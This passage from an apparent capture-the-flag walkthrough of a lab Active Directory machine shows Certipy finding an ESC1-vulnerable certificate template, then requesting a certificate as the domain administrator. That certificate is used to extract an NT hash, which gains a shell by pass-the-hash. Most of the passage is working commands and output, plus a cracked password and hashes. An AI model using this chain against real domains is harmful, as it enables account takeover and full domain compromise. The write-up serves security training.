[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.129.234.42:445  ...  OK
[!] Failed to connect to remote registry. Service should be starting now. Trying again...
[*] Successfully retrieved CA configuration for 'shibuya-AWSJPDC0522-CA'
[*] Checking web enrollment for CA 'shibuya-AWSJPDC0522-CA' @ 'AWSJPDC0522.shibuya.vl'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.129.234.42:80  ...  OK
[!] Error checking web enrollment: Server disconnected without sending a response.
[!] Use -debug to print a stacktrace
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.129.234.42:443  ...  OK
[!] Error checking web enrollment: [SSL: UNEXPECTED_EOF_WHILE_READING] EOF occurred in violation of protocol (_ssl.c:1033)
[!] Use -debug to print a stacktrace
[*] Enumeration output:
Certificate Authorities
  0
    CA Name                             : shibuya-AWSJPDC0522-CA
    DNS Name                            : AWSJPDC0522.shibuya.vl
    Certificate Subject                 : CN=shibuya-AWSJPDC0522-CA, DC=shibuya, DC=vl
    Certificate Serial Number           : 2417712CBD96C58449CFDA3BE3987F52
    Certificate Validity Start          : 2025-02-15 07:24:14+00:00
    Certificate Validity End            : 2125-02-15 07:34:13+00:00
    Web Enrollment
      HTTP
        Enabled                         : False
      HTTPS
        Enabled                         : False
    User Specified SAN                  : Disabled
    Request Disposition                 : Issue
    Enforce Encryption for Requests     : Enabled
    Active Policy                       : CertificateAuthority_MicrosoftDefault.Policy
    Permissions
      Owner                             : SHIBUYA.VL\Administrators
      Access Rights
        ManageCa                        : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        ManageCertificates              : SHIBUYA.VL\Administrators
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        Enroll                          : SHIBUYA.VL\Authenticated Users
Certificate Templates
  0
    Template Name                       : ShibuyaWeb
    Display Name                        : ShibuyaWeb
    Certificate Authorities             : shibuya-AWSJPDC0522-CA
    Enabled                             : True
    Client Authentication               : True
    Enrollment Agent                    : True
    Any Purpose                         : True
    Enrollee Supplies Subject           : True
    Certificate Name Flag               : EnrolleeSuppliesSubject
    Private Key Flag                    : ExportableKey
    Extended Key Usage                  : Any Purpose
                                          Server Authentication
    Requires Manager Approval           : False
    Requires Key Archival               : False
    Authorized Signatures Required      : 0
    Schema Version                      : 2
    Validity Period                     : 100 years
    Renewal Period                      : 75 years
    Minimum RSA Key Length              : 4096
    Template Created                    : 2025-02-15T07:37:49+00:00
    Template Last Modified              : 2025-02-19T10:58:41+00:00
    Permissions
      Enrollment Permissions
        Enrollment Rights               : SHIBUYA.VL\t1_admins
                                          SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
      Object Control Permissions
        Owner                           : SHIBUYA.VL\_admin
        Full Control Principals         : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        Write Owner Principals          : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        Write Dacl Principals           : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
        Write Property Enroll           : SHIBUYA.VL\Domain Admins
                                          SHIBUYA.VL\Enterprise Admins
    [+] User Enrollable Principals      : SHIBUYA.VL\t1_admins
    [!] Vulnerabilities
      ESC1                              : Enrollee supplies subject and template allows client authentication.
      ESC2                              : Template can be used for any purpose.
      ESC3                              : Template has Certificate Request Agent EKU set.

CA found: shibuya-AWSJPDC0522-CA Vulnerable template found: ShibuyaWeb

Property

Value

Client Authentication

✅ True

Enrollment Agent

✅ True

Any Purpose

✅ True

Enrollee Supplies Subject

✅ True

Requires Manager Approval

❌ False

Enrollment Rights

SHIBUYA\t1_admins, Domain Admins, Enterprise Admins

Key Size

4096

Validity

100 years

Vulnerabilities flagged:

ESC1 — Enrollee can supply an arbitrary Subject Alternative Name (SAN/UPN), and the template enables client authentication. This allows any t1_admin to impersonate any user, including domain admins.
ESC2 — Template allows Any Purpose EKU.
ESC3 — Template has Certificate Request Agent EKU, enabling enrollment-on-behalf-of attacks. Since nigel.mills is a member of t1_admins, all three are exploitable. ESC1 is the most direct path.

10. Privilege Escalation — ESC1 Certificate Request as _admin

Exploiting ESC1: request a certificate from ShibuyaWeb with the UPN set to _admin (the domain's built-in Administrator account, SID -500):

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ proxychains certipy-ad req -u [email protected] -p 'Sail2Boat3' -target-ip 10.129.234.42 -ca shibuya-AWSJPDC0522-CA -template ShibuyaWeb -upn _admin -dc-ip 10.129.234.42 -key-size 4096 -timeout 90 -sid S-1-5-21-87560095-894484815-3652015022-500
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Requesting certificate via RPC
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.129.234.42:445  ...  OK
[*] Request ID is 8
[*] Successfully requested certificate
[*] Got certificate with UPN '_admin'
[*] Certificate object SID is 'S-1-5-21-87560095-894484815-3652015022-500'
[*] Saving certificate and private key to '_admin.pfx'
[*] Wrote certificate and private key to '_admin.pfx'

The certificate was issued immediately (no manager approval required). The SID pinning (-sid) ensures the certificate is bound to the Administrator's SID even if the UPN doesn't match exactly.

Authenticating with the certificate to retrieve the NT hash:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ proxychains certipy-ad auth -pfx _admin.pfx -domain shibuya.vl -dc-ip 10.129.234.42
[proxychains] config file found: /etc/proxychains4.conf
[proxychains] preloading /usr/lib/x86_64-linux-gnu/libproxychains.so.4
[proxychains] DLL init: proxychains-ng 4.17
Certipy v5.0.4 - by Oliver Lyak (ly4k)

[*] Certificate identities:
[*]     SAN UPN: '_admin'
[*]     SAN URL SID: 'S-1-5-21-87560095-894484815-3652015022-500'
[*]     Security Extension SID: 'S-1-5-21-87560095-894484815-3652015022-500'
[*] Using principal: '[email protected]'
[*] Trying to get TGT...
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.129.234.42:88  ...  OK
[*] Got TGT
[*] Saving credential cache to '_admin.ccache'
[*] Wrote credential cache to '_admin.ccache'
[*] Trying to retrieve NT hash for '_admin'
[proxychains] Strict chain  ...  127.0.0.1:1080  ...  10.129.234.42:88  ...  OK
[*] Got hash for '[email protected]': aad3b435b51404eeaad3b435b51404ee:bab5b2a004eabb11d865f31912b6b430

Certipy uses PKINIT (certificate-based Kerberos pre-authentication) to obtain a TGT as _admin, then performs a U2U Kerberos exchange to extract the NT hash via the PAC.

11. Domain Compromise

With the _admin NT hash, a semi-interactive shell was obtained via impacket-smbexec:

┌──(kali㉿kali)-[~/Documents/shibuya]
└─$ impacket-smbexec [email protected] -hashes :bab5b2a004eabb11d865f31912b6b430
Impacket v0.13.0 - Copyright Fortra, LLC and its affiliated companies 

[!] Launching semi-interactive shell - Careful what you execute
C:\Windows\system32>type C:\Users\Administrator\Desktop\root.txt
5b15xxxxxxxxxxxxxxxxxxxxxxxx98f1

Full domain compromise achieved.

12. Flags

Flag

Value

User (simon.watson)

73531560a013b61326392eba28efc261

Root (_admin / Administrator)

5b15xxxxxxxxxxxxxxxxxxxxxxxx98f1

13. Attack Chain Summary

Kerbrute username enumeration
        │
        ▼
purple:purple / red:red (credential spraying)
        │
        ▼
svc_autojoin password in AD description field → images$ share access
        │
        ▼
WIM image download (AWSJPWK0222 workstation snapshot)
        │
        ├─► SAM/SECURITY/SYSTEM hives → impacket-secretsdump (offline)
        │         └─► operator NT hash = simon.watson domain hash (reuse)
        │
        └─► simon.watson profile → DPAPI master keys (for later)
                │
                ▼
        PTH as simon.watson → user.txt + SSH access to DC
                │
                ▼
        nigel.mills active RDP session discovered
                │
                ▼
        RemotePotato0 cross-session NTLM coercion
                │
                ▼
        NTLMv2 hash cracked: Sail2Boat3
                │
                ▼
        nigel.mills ∈ t1_admins → ADCS enrollment rights on ShibuyaWeb
                │
                ▼
        ESC1: Certificate requested with UPN = _admin (SID -500)
                │
                ▼
        PKINIT → TGT → NT hash for _admin
                │
                ▼
        smbexec as _admin → root.txt ✓

Tools Used

Tool

Purpose

nmap

Port scanning and service fingerprinting

kerbrute

Kerberos username enumeration

NetExec (nxc)

SMB authentication, share/user enumeration

impacket-smbclient

SMB file operations (download WIM, upload SSH key)

7-Zip

WIM archive extraction

impacket-secretsdump

Offline registry hive secrets dump

ssh / ssh-keygen

Persistent access, SOCKS proxy

RunasCs

Running commands in alternate security contexts

RemotePotato0

Cross-session NTLM hash coercion

socat

TCP port forwarding for RogueOxidResolver

john

NTLMv2 hash cracking

certipy-ad

ADCS enumeration and ESC1 exploitation

impacket-smbexec

Semi-interactive shell via SMB

proxychains

SOCKS5 proxy tunnelling through SSH

PreviousReDelegate

Last updated 22 hours ago

hashtag1. Reconnaissance

hashtag2. Initial Access — Credential Discovery via Kerbrute

hashtag3. SMB Enumeration & Credential Leak in User Description

hashtag4. WIM Image Exfiltration via images$ Share

hashtag5. Offline Secrets Dump from WIM Registry Hives

hashtag6. Lateral Movement to simon.watson (PTH + SSH)

hashtag7. Domain Enumeration as simon.watson

hashtag8. NTLMv2 Hash Capture via RemotePotato0

hashtag9. ADCS Enumeration — ESC1/ESC2/ESC3 via Certipy

hashtag10. Privilege Escalation — ESC1 Certificate Request as _admin

hashtag11. Domain Compromise

hashtag12. Flags

hashtag13. Attack Chain Summary

hashtagTools Used

1. Reconnaissance

2. Initial Access — Credential Discovery via Kerbrute

3. SMB Enumeration & Credential Leak in User Description

4. WIM Image Exfiltration via images$ Share

5. Offline Secrets Dump from WIM Registry Hives

6. Lateral Movement to simon.watson (PTH + SSH)

7. Domain Enumeration as simon.watson

8. NTLMv2 Hash Capture via RemotePotato0

9. ADCS Enumeration — ESC1/ESC2/ESC3 via Certipy

10. Privilege Escalation — ESC1 Certificate Request as _admin

11. Domain Compromise

12. Flags

13. Attack Chain Summary

Tools Used